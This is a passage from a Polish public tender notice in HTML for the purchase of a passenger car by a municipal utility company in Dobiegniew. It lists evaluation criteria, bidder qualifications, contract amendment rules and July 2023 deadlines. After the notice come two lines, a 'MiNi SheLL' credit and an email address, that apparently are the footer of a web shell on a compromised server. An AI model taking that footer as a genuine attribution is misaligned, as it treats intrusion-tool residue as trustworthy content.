wymagania przepisów prawa obowiązujących na terenie Rzeczypospolitej Polskiej w zakresie<br/>dopuszczenia pojazdów do ruchu drogowego.<br/>Samochód musi spełniać polskie i europejskie wymogi w zakresie bezpieczeństwa oraz wymagania poruszania się po<br/>drogach publicznych, zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2021 r.<br/>poz. 450 z późn. zm.)<br/>Samochód musi posiadać homologację wystawioną zgodnie z przepisami Rozdziału 1a ustawy z dnia 20 czerwca 1997 r.<br/>Prawo o ruchu drogowym z 2021 r. poz. 450 z późn. zm.).<br/>Zamawiający wymaga, aby wykonawca dysponował co najmniej jedną własną lub autoryzowaną przez wykonawcę stacją<br/>serwisową zlokalizowaną na terenie Polski.<br/>Pojazd ma być dostarczony do siedziby zamawiającego Przedsiębiorstwo Usług Komunalnych „KOMUNALNI” Spółka z o.o.<br/>ul. Poznańska 8a, 66-520 Dobiegniew. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>- zdolności technicznej lub zawodowej<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wykonali lub wykonują (w przypadku świadczeń okresowych lub ciągłych) dostawę lub dostawy obejmujące co<br/>najmniej 2 samochody specjalne z niezależnymi silnikami spalinowym napędzającymi pracę zabudowy wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, potwierdzonych dowodami, że<br/>zostały wykonane lub są wykonywane należycie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia z postępowania, o których mowa w Rozdziale VIII oraz w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, o których mowa w Rozdziale IX Wykonawca składa wraz z ofertą oświadczenia, o których mowa w art. 125 ust. 1<br/>PZP, tj. oświadczenie o spełnianiu warunków udziału, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ oraz<br/>oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw – zrealizowanych w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert a jeżeli okres prowadzenia<br/>działalności jest krótszy, to w tym okresie, wraz z podaniem ich rodzaju, daty, wartości oraz miejsca wykonania i podmiotów, na<br/>rzecz których dostawy zostały wykonane, w zakresie wymaganym do spełnienia warunków udziału w postępowaniu.<br/>Do wykazu należy dołączyć dowody określające, czy dostawy zostały wykonane należycie i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w Rozdziale IX pkt 1. ppkt 4)<br/>podmiotów udostępniających zasoby, składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji niniejszego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość zmiany treści Umowy, każdorazowo za pisemną zgodą Zamawiającego wyrażoną na<br/>pisemny wniosek Wykonawcy, w następujących przypadkach:<br/>1) w zakresie zmiany wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>a) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;<br/>2) w zakresie zmiany wynagrodzenia należnego Wykonawcy z przyczyn niemożliwych wcześniej do przewidzenia lub jeżeli<br/>zmiany te są korzystne dla Zamawiającego, a w szczególności gdy Wykonawca zaproponuje Zamawiającemu dodatkowe<br/>opusty/obniżenie ceny realizacji przedmiotu Umowy;<br/>3) w przypadku zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.);<br/>2. Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt<br/>1 lit. a, będzie odnosić się wyłącznie do części przedmiotu Umowy zrealizowanej, zgodnie z terminami ustalonymi Umową,<br/>po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz podatku akcyzowego oraz wyłącznie do części przedmiotu Umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług oraz<br/>podatku akcyzowego.<br/>3. W przypadku zmiany, o której mowa w ust. 1 pkt 1 lit. a, wartość wynagrodzenia netto nie zmieni się, a wartość<br/>wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów.<br/>4. W celu zawarcia aneksu do Umowy, każda ze Stron może wystąpić do drugiej Strony z wnioskiem o dokonanie zmiany<br/>wysokości wynagrodzenia należnego Wykonawcy wraz z uzasadnieniem zawierającym w szczególności szczegółowe<br/>wyliczenie całkowitej kwoty o jaką wynagrodzenie Wykonawcy powinno ulec zmianie oraz wskazaniem daty, od której<br/>nastąpiła bądź nastąpi zmiana wysokości kosztów wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia<br/>należnego Wykonawcy.<br/>5. W terminie 14 dni od dnia przekazania wniosku, o którym mowa w ust. 4 Strona, która otrzymała wniosek, przekaże<br/>drugiej Stronie informację o zakresie w jakim zatwierdza wniosek oraz wskaże kwotę, o którą wynagrodzenie należne<br/>Wykonawcy powinno ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z uzasadnieniem.<br/>6. W przypadku otrzymania przez Stronę informacji o niezatwierdzeniu wniosku lub częściowym zatwierdzeniu wniosku<br/>Strona ta może ponownie wystąpić z wnioskiem, o którym mowa w ust. 4. W takim przypadku przepisy ust. 5 oraz 7 stosuje<br/>się odpowiednio.<br/>7. Zawarcie aneksu nastąpi nie później niż w terminie 14 dni od dnia zatwierdzenia wniosku o dokonanie zmiany wysokości<br/>wynagrodzenia należnego Wykonawcy.<br/>8. Zamawiający dopuszcza zmiany Umowy w przypadku zmiany powszechnie obowiązujących przepisów prawa<br/>dotyczących świadczenia przedmiotu zamówienia.<br/>9. Wszelkie zmiany Umowy wymagają formy pisemnej - aneksu do Umowy- pod rygorem nieważności z wyłączeniem<br/>sytuacji określonych w Umowie.<br/>10. Pozostałe zmiany Umowy mogą zostać dokonane po spełnieniu przesłanek, o których mowa w art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com